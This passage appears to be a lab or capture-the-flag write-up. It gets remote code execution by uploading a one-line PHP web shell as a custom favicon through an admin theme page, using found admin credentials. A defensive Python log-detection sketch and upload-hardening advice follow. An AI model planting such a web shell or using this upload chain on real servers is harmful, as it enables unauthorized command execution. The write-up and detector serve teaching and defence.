Exploitation

Following this tutorial, I managed to upload a custom icon with the credentials found for the admin user.

I went to /Web/admin/manage_theme.php

Uploaded this backdoor.php

<pre>
<?php
system($_GET['cmd']);
?>
</pre>

Navigate to the custom-favicon.php file, give a command as input, and you have achieved RCE. Wohoooo!!!
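From the defender's side, this chain leaves a recognisable trace in the web server access log: an icon-named file served with a script extension, usually with query parameters, shortly after a POST to the theme page. The detection sketch below is an added example, not part of the original write-up; the log lines, IP addresses and the `/Web/custom-favicon.*` location are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not from the original page.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Web/custom-favicon.png HTTP/1.1" 200 1150 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:02:13 +0000] "POST /Web/admin/manage_theme.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:02:40 +0000] "GET /Web/custom-favicon.php?cmd=id HTTP/1.1" 200 54 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:03:00 +0000] "GET /Web/index.php?redirect=dashboard HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
SCRIPT_EXT = (".php", ".phtml", ".phar", ".php5")   # extensions the server may execute
ASSET_HINT = re.compile(r"(favicon|logo|icon)", re.I)  # names that should be static images


def find_suspicious(log_text):
    """Flag requests for image-like assets that carry an executable extension."""
    hits = []
    theme_posters = set()  # clients that POSTed to the theme page earlier in the log
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, ts, method, target, status = m.groups()
        url = urlsplit(target)
        name = url.path.rsplit("/", 1)[-1].lower()
        if method == "POST" and name == "manage_theme.php":
            theme_posters.add(ip)
        if ASSET_HINT.search(name) and name.endswith(SCRIPT_EXT):
            hits.append({
                "ip": ip,
                "time": ts,
                "path": url.path,
                "params": sorted(parse_qs(url.query)),  # parameter names only
                "status": int(status),
                "after_theme_post": ip in theme_posters,
            })
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit)
```

The durable fix is on the upload side: accept only image types and store the icon under a server-chosen name and extension.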
